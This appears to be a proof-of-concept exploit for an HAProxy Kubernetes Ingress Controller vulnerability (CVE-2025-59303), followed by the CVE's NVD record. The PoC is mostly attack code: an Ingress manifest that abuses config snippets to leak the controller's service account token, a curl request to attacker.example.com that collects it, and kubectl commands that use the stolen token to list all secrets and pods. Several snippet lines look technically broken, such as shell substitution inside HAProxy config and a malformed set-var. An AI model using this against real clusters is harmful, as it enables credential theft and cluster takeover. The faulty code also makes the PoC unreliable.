CVE-2025-59303

# CVE-2025-59303 - HAProxy Kubernetes Ingress Controller Secret Leak PoC # This PoC demonstrates how an attacker with create/update permissions on Ingress # resources can exploit the config-snippets feature to leak the ingress controller's # service account token. apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: malicious-ingress namespace: attacker-namespace annotations: # The config-snippet that leaks the service account token via HTTP response header haproxy.org/config-snippet: | http-request set-header X-Token %[env(TOKEN)] http-request set-header X-Token-File "$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" # Alternative: use lua to read the token file and inject into response http-request lua.load /etc/haproxy/lua/leak_token.lua # Or use external-check command to exfiltrate the token http-request set-var(txn.token) str(),/var/run/secrets/kubernetes.io/serviceaccount/token http-request set-header X-Leaked-Token %[var(txn.token)] spec: rules: - host: attacker.example.com http: paths: - path: / pathType: Prefix backend: service: name: backend-service port: number: 80 --- # After creating the above Ingress, the attacker sends a request to the # configured host and extracts the token from the response headers: # # curl -v http://attacker.example.com/ # Response headers will contain: # X-Token-File: eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9... # # The extracted token can then be used to authenticate against the # Kubernetes API Server as the ingress controller's service account: # # TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9..." # kubectl --token=$TOKEN --server=https://kubernetes-api:6443 get secrets -A # kubectl --token=$TOKEN --server=https://kubernetes-api:6443 get pods -A

{"cve": {"id": "CVE-2025-59303", "sourceIdentifier": "[email protected]", "published": "2025-10-08T16:15:38.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HAProxy Kubernetes Ingress Controller before 3.1.13, when the config-snippets feature flag is used, accepts config snippets from users with create/update permissions. This can result in obtaining an ingress token secret as a response. The fixed versions of HAProxy Enterprise Kubernetes Ingress Controller are 3.0.16-ee1, 1.11.13-ee1, and 1.9.15-ee1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-791"}]}], "references": [{"url": "https://haproxy.com/blog/cve-2025-59303-haproxy-kubernetes-ingress-controller-secret-leak", "source": "[email protected]"}]}}